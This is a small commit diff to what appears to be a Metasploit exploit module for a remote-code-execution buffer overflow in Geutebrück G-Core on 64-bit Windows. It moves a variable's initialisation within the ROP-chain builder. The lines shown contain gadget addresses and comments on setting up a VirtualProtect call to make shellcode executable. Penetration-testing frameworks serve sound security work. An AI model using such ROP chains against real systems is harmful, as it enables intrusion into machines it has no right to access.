added one missing change

Maurice Popp · Maurice Popp · commit 6683ba501f21 · 2017-11-07T20:05:43.000+01:00
diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb
@@ -76,6 +76,7 @@ def check
         end
 
         def ropchain(target)
+          rop = ''
           # These bytes "\x43" are sacrificed ; we align the stack to jump over this messed up crap.
           stack_align = "\x43" * 16
 
@@ -111,7 +112,6 @@ def ropchain(target)
             # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
             # We want RCX to hold the value for VP Argument "Address of Shellcode"
             # 0x140cc2234 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
-            rop = ''
             rop << [0x140cc2234].pack('Q<')
             rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
             # 0x1400ae2ae    | POP RDX; RETN
@@ -180,7 +180,6 @@ def ropchain(target)
             # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
             # We want RCX to hold the value for VP Argument "Address of Shellcode"
             # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
-            rop = ''
             rop << [0x140ccb984].pack('Q<')
             rop << [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
             # 0x14008f7ec      | POP RDX; RETN
